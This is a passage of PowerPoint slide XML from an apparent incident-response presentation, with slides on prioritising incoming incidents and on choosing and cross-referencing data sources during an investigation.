              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How many of those resources?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Reprioritize as each new incident arrives</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23555" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC468B50-65A6-3D45-BC34-C04E2C336B29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7566025" y="2855913"/>
            <a:ext cx="989013" cy="379412"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="BF5900"/>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>#1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23556" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD79379C-22F7-7B4B-9B1C-1790E2D7B9B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7566025" y="3236913"/>
            <a:ext cx="989013" cy="379412"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C0504D"/>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>#2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23557" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E9CD25B-B8BC-D74D-9E73-E8815D46AE41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7566025" y="3617913"/>
            <a:ext cx="989013" cy="379412"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D99F82"/>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>#3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23558" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1D6A57A-1232-CD48-AC4F-25DA4F335130}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7566025" y="3998913"/>
            <a:ext cx="989013" cy="379412"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFD579"/>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>#4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23559" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23E7AE9D-F151-114E-BBA7-3FF7B22FC4D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7566025" y="4379913"/>
            <a:ext cx="989013" cy="379412"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFE900"/>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a:lnSpc>
                <a:spcPct val="93000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23560" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DA74C70-B6CE-224F-B65F-BE153E1EBA8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7566025" y="4760913"/>
            <a:ext cx="989013" cy="379412"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C5D542"/>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a:lnSpc>
                <a:spcPct val="93000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23561" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{053FBFEC-68E6-FD4E-8CE6-7BE84F656023}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7566025" y="5141913"/>
            <a:ext cx="989013" cy="379412"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="91B44E"/>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a:lnSpc>
                <a:spcPct val="93000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23562" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D593A2CE-5E2A-EB4C-874F-ABF52BA144AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7566025" y="5522913"/>
            <a:ext cx="989013" cy="379412"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="002541"/>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a:lnSpc>
                <a:spcPct val="93000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23563" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B4E5C95-6157-CC4E-BEF5-DCC0A5FF14D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6376988" y="5324475"/>
            <a:ext cx="989012" cy="379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Lst>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Droid Sans Fallback" charset="0"/>
                <a:cs typeface="Droid Sans Fallback" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="003F0B"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>New</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Right Arrow 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C33EFCFA-623F-BA45-BF99-A9807A33D2C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7122591" y="5445224"/>
            <a:ext cx="401737" cy="182563"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="92D050"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="00645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en-GB" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="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
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84673843-210F-134E-AA63-29CE63BF7DEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="350838"/>
            <a:ext cx="8228013"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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Investigation Continues  with Cross-Referencing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ources</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25602" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD019BF6-B2AC-1846-BF8F-F68A79FE7593}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457201" y="1116013"/>
            <a:ext cx="7643192" cy="36845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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Droid Sans Fallback" charset="0"/>
                <a:cs typeface="Droid Sans Fallback" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="293688" indent="-2921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04000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ask questions to intelligently select sources:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="104000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>With which additional data sources should I start? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="104000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What assortment of data sources do I need to examine?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="104000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What additional information do I need to collect or include?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="104000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How do I correlate or join </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>together my multiple sources? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="104000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What queries can I perform </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>against my data store and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>external data stores?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="104000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How should I prioritize </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>the set of sources </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>I have selected?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="Group 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5999061B-92B4-D049-A8E3-BBE03728C379}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4478338" y="3709988"/>
            <a:ext cx="4268787" cy="2781300"/>
            <a:chOff x="4478338" y="3709988"/>
            <a:chExt cx="4268787" cy="2781300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25603" name="Rectangle 3">
              <a:extLst>
